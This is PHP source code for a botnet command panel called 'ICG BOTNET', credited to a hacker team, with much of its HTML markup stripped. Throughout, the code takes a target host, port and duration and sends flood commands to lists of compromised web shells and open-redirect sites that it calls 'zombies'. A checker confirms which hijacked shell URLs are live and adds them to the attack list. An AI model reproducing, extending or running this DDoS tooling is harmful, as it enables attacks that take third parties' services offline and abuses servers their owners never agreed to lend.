ICG BOTNET "Yandere Army Edition"

Coded by Yukinoshita 47 - Team Garuda Security Hacker - "Middle East Connection" ICG BOTNET "Yandere Army Edition"

ICG BOTNET "Yandere Army Edition"

'; } if (isset($_GET['Home'])) { // Menu Home echo'


Hello "Otaku" World



'; } if (isset($_GET['Weapon'])) { // Menu Weapon Panel echo '

Weapons Panel


Target (Dont use last slash /) :

Port :

Time To DDos (s) :

Your Access password (Default: gsh1337)

Flood Type :

Flood method (Use OpenRedirect Websites OR use server accesses) :





'; } if(isset($_POST['host']) && isset($_POST['port']) && isset($_POST['pass']) && isset($_POST['time']) && isset($_POST['type']) && $_POST['method']=="1"){ $pass = $_POST['pass']; $host = $_POST['host']; $port = $_POST['port']; $type = $_POST['type']; $time = $_POST['time']; $op = file_get_contents("Zombies/orzombies.txt"); $zombies = explode("\n", $op); foreach ($zombies as $zombie) { $url = $zombie.$host; $c = curl_init(); $opt = array( CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => false, CURLOPT_HEADER => true, CURLOPT_FOLLOWLOCATION =>false, CURLOPT_NOBODY => true ); curl_setopt_array($c, $opt); $res = curl_exec($c); curl_close($c); echo $res."
"; }} elseif(isset($_POST['host']) && isset($_POST['port']) && isset($_POST['pass']) && isset($_POST['time']) && isset($_POST['type']) && $_POST['method']=="2"){ $pass = $_POST['pass']; $host = $_POST['host']; if(preg_match("/http:\/\//", $host)){ $host = str_replace("http://", "", $host); }elseif(preg_match("/https:\/\//", $host)){ $host = str_replace("https://", "", $host); } $port = $_POST['port']; $type = $_POST['type']; $time = $_POST['time']; $data = array( "type" => "$type", "host" => "$host", "time" => "$time", "port" => "$port", "pass" => "$pass" ); $access = file_get_contents("Zombies/Zombies.txt"); $accesss = explode("\r\n", $access); foreach ($accesss as $zombie) { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $zombie); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, $data); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); curl_setopt($c, CURLOPT_HEADER, true); $res = curl_exec($c); curl_close($c); echo "Command Sent to $zombie
Target is:
$type$host:$port
$res
"; } } if (isset($_GET['Zombie'])) // Menu Zombie Connection Checker echo "

Zombie Soldier Connection Status Checker



"; function get_http_response_code($theurl) { $headers = get_headers($theurl); $status = substr($headers[0], 9, 3); $p = parse_url($theurl); $host = explode(':', $p['host']); $hostname = $host[0]; if ($status == 200) { $visitor = $_SERVER["REMOTE_ADDRS"]; $judul = "shell: $theurl "; $body = "shell: $theurl"; if (!empty($theurl)) { } $writeuRl = $theurl . " "; $fh = fopen("Zombies/Zombies.txt", "a"); fwrite($fh, $writeuRl, strlen($writeuRl)); echo "Boss Zombies Ready To Attack !!! - " . $theurl . "
"; } elseif ($status == 500) { echo "" . $status . " Sorry Boss 500 Internal Server Error - " . $theurl . "
"; } else { $writeuRl = $theurl . " "; fwrite($fh, $writeuRl, strlen($writeuRl)); echo "Boss Zombies Not Found - " . $theurl . "
"; } } if (isset($_POST['Submit'])) { $hosts = explode(" ", $_POST['url']); $values = array(); foreach ($hosts as $host) { if ($host != "") { @get_http_response_code("$host"); } } echo "
Finish.. :D"; } if (isset($_GET['Clear'])) { // Clear Zombie List echo''; } if (isset($_GET['Check'])) { // Menu Check Target status Up / down echo'

Check Target status Up / down


'; // Logout }if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; }